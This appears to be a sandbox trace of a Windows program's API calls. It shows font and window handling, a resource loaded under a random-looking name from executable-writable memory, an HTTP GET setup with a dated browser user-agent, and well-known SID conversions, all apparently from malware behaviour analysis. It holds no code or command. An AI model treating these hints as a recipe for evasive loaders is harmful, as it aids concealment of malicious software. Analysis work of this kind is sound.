[0189.767] GetCurrentThreadId () returned 0x5a8
[0189.767] GetCurrentThreadId () returned 0x5a8
[0189.767] ResetEvent (hEvent=0xa0) returned 1
[0189.767] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f354, fWinIni=0x0 | out: pvParam=0x12f354) returned 1
[0189.768] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f354, fWinIni=0x0 | out: pvParam=0x12f354) returned 1
[0189.768] GetSystemMetrics (nIndex=49) returned 16
[0189.768] GetSystemMetrics (nIndex=50) returned 16
[0189.768] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f39c, fWinIni=0x0 | out: pvParam=0x12f39c) returned 1
[0189.768] IsWindowVisible (hWnd=0xf01de) returned 0
[0189.768] GetCurrentThreadId () returned 0x5a8
[0189.768] VirtualQuery (in: lpAddress=0x2a01668, lpBuffer=0x12f26c, dwLength=0x1c | out: lpBuffer=0x12f26c*(BaseAddress=0x2a01000, AllocationBase=0x2940000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0189.768] FindResourceA (hModule=0x2940000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a48990
[0189.768] FindResourceA (hModule=0x2940000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a48990
[0189.768] LoadResource (hModule=0x2940000, hResInfo=0x2a48990) returned 0x2a4f044
[0189.768] SizeofResource (hModule=0x2940000, hResInfo=0x2a48990) returned 0xca5
[0189.768] LockResource (hResData=0x2a4f044) returned 0x2a4f044
[0189.768] GetCurrentThreadId () returned 0x5a8
[0189.769] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f020, fWinIni=0x0 | out: pvParam=0x12f020) returned 1
[0189.769] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f020, fWinIni=0x0 | out: pvParam=0x12f020) returned 1
[0189.769] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f020, fWinIni=0x0 | out: pvParam=0x12f020) returned 1
[0189.769] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f020, fWinIni=0x0 | out: pvParam=0x12f020) returned 1
[0189.770] GetDC (hWnd=0x0) returned 0x74010839
[0189.770] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f004 | out: lptm=0x12f004) returned 1
[0189.770] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0189.771] CreateFontIndirectA (lplf=0x12efbc) returned 0x5d0a0841
[0189.771] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.771] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f03c | out: lptm=0x12f03c) returned 1
[0189.771] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.771] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.771] GetSystemMetrics (nIndex=6) returned 1
[0189.771] VirtualAlloc (lpAddress=0x2a64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a64000
[0189.772] GetDC (hWnd=0x0) returned 0x74010839
[0189.772] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f004 | out: lptm=0x12f004) returned 1
[0189.772] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.772] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f03c | out: lptm=0x12f03c) returned 1
[0189.772] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.772] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.772] GetSystemMetrics (nIndex=6) returned 1
[0189.772] GetDC (hWnd=0x0) returned 0x74010839
[0189.772] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f004 | out: lptm=0x12f004) returned 1
[0189.772] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.772] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f03c | out: lptm=0x12f03c) returned 1
[0189.772] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.772] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.772] GetSystemMetrics (nIndex=6) returned 1
[0189.773] GetDC (hWnd=0x0) returned 0x74010839
[0189.773] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f004 | out: lptm=0x12f004) returned 1
[0189.773] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.773] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f03c | out: lptm=0x12f03c) returned 1
[0189.773] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.773] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.773] GetSystemMetrics (nIndex=6) returned 1
[0189.773] GetDC (hWnd=0x0) returned 0x74010839
[0189.773] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f018 | out: lptm=0x12f018) returned 1
[0189.773] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.773] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f050 | out: lptm=0x12f050) returned 1
[0189.773] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.773] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.773] GetSystemMetrics (nIndex=6) returned 1
[0189.773] GetDC (hWnd=0x0) returned 0x74010839
[0189.773] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed1c | out: lptm=0x12ed1c) returned 1
[0189.773] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.773] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed54 | out: lptm=0x12ed54) returned 1
[0189.774] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.774] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.774] GetSystemMetrics (nIndex=6) returned 1
[0189.774] GetDC (hWnd=0x0) returned 0x74010839
[0189.774] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f018 | out: lptm=0x12f018) returned 1
[0189.774] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.774] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f050 | out: lptm=0x12f050) returned 1
[0189.774] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.774] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.774] GetSystemMetrics (nIndex=6) returned 1
[0189.774] GetDC (hWnd=0x0) returned 0x74010839
[0189.774] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed1c | out: lptm=0x12ed1c) returned 1
[0189.774] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.774] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed54 | out: lptm=0x12ed54) returned 1
[0189.774] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.774] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.774] GetSystemMetrics (nIndex=6) returned 1
[0189.775] GetDC (hWnd=0x0) returned 0x74010839
[0189.775] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f018 | out: lptm=0x12f018) returned 1
[0189.775] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.775] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f050 | out: lptm=0x12f050) returned 1
[0189.775] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.775] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.775] GetSystemMetrics (nIndex=6) returned 1
[0189.775] GetDC (hWnd=0x0) returned 0x74010839
[0189.775] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed1c | out: lptm=0x12ed1c) returned 1
[0189.775] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.775] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed54 | out: lptm=0x12ed54) returned 1
[0189.775] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.775] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.775] GetSystemMetrics (nIndex=6) returned 1
[0189.775] GetDC (hWnd=0x0) returned 0x74010839
[0189.775] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f004 | out: lptm=0x12f004) returned 1
[0189.775] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.775] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f03c | out: lptm=0x12f03c) returned 1
[0189.775] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.775] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.775] GetSystemMetrics (nIndex=6) returned 1
[0189.776] GetDC (hWnd=0x0) returned 0x74010839
[0189.776] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f004 | out: lptm=0x12f004) returned 1
[0189.776] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.776] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f03c | out: lptm=0x12f03c) returned 1
[0189.776] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.776] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.776] GetSystemMetrics (nIndex=6) returned 1
[0189.776] GetDC (hWnd=0x0) returned 0x74010839
[0189.776] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f018 | out: lptm=0x12f018) returned 1
[0189.776] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.776] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f050 | out: lptm=0x12f050) returned 1
[0189.776] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.776] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.776] GetSystemMetrics (nIndex=6) returned 1
[0189.776] GetDC (hWnd=0x0) returned 0x74010839
[0189.776] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed1c | out: lptm=0x12ed1c) returned 1
[0189.777] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.777] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed54 | out: lptm=0x12ed54) returned 1
[0189.777] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.777] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.777] GetSystemMetrics (nIndex=6) returned 1
[0189.777] GetDC (hWnd=0x0) returned 0x74010839
[0189.777] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f018 | out: lptm=0x12f018) returned 1
[0189.777] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.777] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f050 | out: lptm=0x12f050) returned 1
[0189.777] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.777] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.777] GetSystemMetrics (nIndex=6) returned 1
[0189.777] GetDC (hWnd=0x0) returned 0x74010839
[0189.777] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed1c | out: lptm=0x12ed1c) returned 1
[0189.777] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.777] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed54 | out: lptm=0x12ed54) returned 1
[0189.777] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.777] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.777] GetSystemMetrics (nIndex=6) returned 1
[0189.778] GetDC (hWnd=0x0) returned 0x74010839
[0189.778] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f018 | out: lptm=0x12f018) returned 1
[0189.778] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.778] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f050 | out: lptm=0x12f050) returned 1
[0189.778] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.778] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.778] GetSystemMetrics (nIndex=6) returned 1
[0189.778] GetDC (hWnd=0x0) returned 0x74010839
[0189.778] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed1c | out: lptm=0x12ed1c) returned 1
[0189.778] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.778] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed54 | out: lptm=0x12ed54) returned 1
[0189.778] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.778] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.778] GetSystemMetrics (nIndex=6) returned 1
[0189.779] GetDC (hWnd=0x0) returned 0x74010839
[0189.779] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f018 | out: lptm=0x12f018) returned 1
[0189.779] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.779] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f050 | out: lptm=0x12f050) returned 1
[0189.779] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.779] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.779] GetSystemMetrics (nIndex=6) returned 1
[0189.779] GetDC (hWnd=0x0) returned 0x74010839
[0189.779] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed1c | out: lptm=0x12ed1c) returned 1
[0189.779] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.779] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12ed54 | out: lptm=0x12ed54) returned 1
[0189.779] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.779] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.779] GetSystemMetrics (nIndex=6) returned 1
[0189.779] GetDC (hWnd=0x0) returned 0x74010839
[0189.779] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f004 | out: lptm=0x12f004) returned 1
[0189.779] SelectObject (hdc=0x74010839, h=0x5d0a0841) returned 0x18a002e
[0189.779] GetTextMetricsA (in: hdc=0x74010839, lptm=0x12f03c | out: lptm=0x12f03c) returned 1
[0189.779] SelectObject (hdc=0x74010839, h=0x18a002e) returned 0x5d0a0841
[0189.779] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0189.779] GetSystemMetrics (nIndex=6) returned 1
[0189.781] SysReAllocStringLen (in: pbstr=0x2a6f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0189.781] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0189.781] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0189.781] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0189.781] SysReAllocStringLen (in: pbstr=0x2a6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0189.781] SysReAllocStringLen (in: pbstr=0x2a6f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a6f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0189.781] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x12f0a0, lpdwBufferLength=0x12f0a4 | out: lpBuffer=0x12f0a0, lpdwBufferLength=0x12f0a4) returned 1
[0189.890] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x12f0a0, dwBufferLength=0x4) returned 1
[0189.890] VirtualFree (lpAddress=0x2a70000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0189.890] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a66490, cbMultiByte=3, lpWideCharStr=0x12dfd8, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0189.890] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0189.890] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0189.890] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0189.890] SysReAllocStringLen (in: pbstr=0x2a6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0189.890] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0189.890] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0189.890] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0189.890] SysReAllocStringLen (in: pbstr=0x2a6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0189.924] FlatSB_SetScrollProp (param_1=0xb0140, index=0x200, newValue=0x0, param_4=1) returned 0
[0189.924] GetSysColor (nIndex=20) returned 0xffffff
[0189.924] FlatSB_SetScrollProp (param_1=0xb0140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0189.924] FlatSB_SetScrollInfo (param_1=0xb0140, code=0, psi=0x12df0e, fRedraw=1)
[0189.924] CallWindowProcA (lpPrevWndFunc=0x2947038, hWnd=0xb0140, Msg=0x46, wParam=0x0, lParam=0x12de0c) returned 0x0
[0189.929] GetTextExtentPoint32A (in: hdc=0x74010839, lpString="0", c=1, psizl=0x12f194 | out: psizl=0x12f194) returned 1
[0189.929] IsIconic (hWnd=0xb0140) returned 0
[0189.929] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f194 | out: lpRect=0x12f194) returned 1
[0189.929] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.929] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.929] IsIconic (hWnd=0xb0140) returned 0
[0189.929] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0dc | out: lpRect=0x12f0dc) returned 1
[0189.929] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.929] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.929] IsIconic (hWnd=0xb0140) returned 0
[0189.929] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.929] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.929] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.929] IsIconic (hWnd=0xb0140) returned 0
[0189.929] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.929] FlatSB_SetScrollProp (param_1=0xb0140, index=0x200, newValue=0x0, param_4=0) returned 0
[0189.929] GetSysColor (nIndex=20) returned 0xffffff
[0189.929] FlatSB_SetScrollProp (param_1=0xb0140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0189.929] FlatSB_SetScrollInfo (param_1=0xb0140, code=0, psi=0x12f0ea, fRedraw=1) returned 0
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] IsIconic (hWnd=0xb0140) returned 0
[0189.930] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] IsIconic (hWnd=0xb0140) returned 0
[0189.930] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] IsIconic (hWnd=0xb0140) returned 0
[0189.930] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.930] FlatSB_SetScrollProp (param_1=0xb0140, index=0x100, newValue=0x0, param_4=0) returned 0
[0189.930] GetSysColor (nIndex=20) returned 0xffffff
[0189.930] FlatSB_SetScrollProp (param_1=0xb0140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0189.930] FlatSB_SetScrollInfo (param_1=0xb0140, code=1, psi=0x12f0ea, fRedraw=1) returned 0
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] IsIconic (hWnd=0xb0140) returned 0
[0189.930] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] IsIconic (hWnd=0xb0140) returned 0
[0189.930] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0dc | out: lpRect=0x12f0dc) returned 1
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] IsIconic (hWnd=0xb0140) returned 0
[0189.930] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.930] IsIconic (hWnd=0xb0140) returned 0
[0189.930] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.930] FlatSB_SetScrollProp (param_1=0xb0140, index=0x200, newValue=0x0, param_4=0) returned 0
[0189.930] GetSysColor (nIndex=20) returned 0xffffff
[0189.930] FlatSB_SetScrollProp (param_1=0xb0140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0189.930] FlatSB_SetScrollInfo (param_1=0xb0140, code=0, psi=0x12f0ea, fRedraw=1) returned 0
[0189.931] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.931] IsIconic (hWnd=0xb0140) returned 0
[0189.931] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.931] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.931] IsIconic (hWnd=0xb0140) returned 0
[0189.931] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.931] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.931] IsIconic (hWnd=0xb0140) returned 0
[0189.931] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.931] FlatSB_SetScrollProp (param_1=0xb0140, index=0x100, newValue=0x0, param_4=0) returned 0
[0189.931] GetSysColor (nIndex=20) returned 0xffffff
[0189.931] FlatSB_SetScrollProp (param_1=0xb0140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0189.931] FlatSB_SetScrollInfo (param_1=0xb0140, code=1, psi=0x12f0ea, fRedraw=1) returned 0
[0189.931] GetWindowLongA (hWnd=0xb0140, nIndex=-16) returned 116326400
[0189.931] IsIconic (hWnd=0xb0140) returned 0
[0189.931] GetClientRect (in: hWnd=0xb0140, lpRect=0x12f0ac | out: lpRect=0x12f0ac) returned 1
[0189.931] GetCurrentThreadId () returned 0x5a8
[0189.931] ConvertSidToStringSidA () returned 0x1
[0189.932] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.932] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0189.932] LocalFree (hMem=0x306f40) returned 0x0
[0189.932] LocalFree (hMem=0x2f2f90) returned 0x0
[0189.932] ConvertStringSidToSidA () returned 0x1
[0189.932] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a62914, pSourceSid=0x2f2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a62914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0189.932] IsValidSid (pSid=0x2a62914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0189.932] ConvertSidToStringSidA () returned 0x1
[0189.932] LocalFree (hMem=0x306f40) returned 0x0
[0189.932] LocalFree (hMem=0x2f2f90) returned 0x0
[0189.932] ConvertStringSidToSidA () returned 0x1
[0189.932] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6702c, pSourceSid=0x2f2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a6702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0189.932] IsValidSid (pSid=0x2a6702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0189.932] ConvertSidToStringSidA () returned 0x1
[0189.932] LocalFree (hMem=0x306f40) returned 0x0
[0189.932] LocalFree (hMem=0x2f2f90) returned 0x0
[0189.932] ConvertStringSidToSidA () returned 0x1
[0189.932] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f5a0, pSourceSid=0x2f2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a6f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0189.932] IsValidSid (pSid=0x2a6f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0189.932] ConvertSidToStringSidA () returned 0x1
[0189.932] LocalFree (hMem=0x306f40) returned 0x0
[0189.932] LocalFree (hMem=0x2f2f90) returned 0x0
[0189.932] ConvertStringSidToSidA () returned 0x1
[0189.932] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f614, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.932] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.932] ConvertSidToStringSidA () returned 0x1
[0189.932] LocalFree (hMem=0x306f58) returned 0x0
[0189.932] LocalFree (hMem=0x306f40) returned 0x0
[0189.932] ConvertStringSidToSidA () returned 0x1
[0189.932] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f688, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a6f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0189.932] IsValidSid (pSid=0x2a6f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0189.932] ConvertSidToStringSidA () returned 0x1
[0189.932] LocalFree (hMem=0x306f58) returned 0x0
[0189.932] LocalFree (hMem=0x306f40) returned 0x0
[0189.933] ConvertStringSidToSidA () returned 0x1
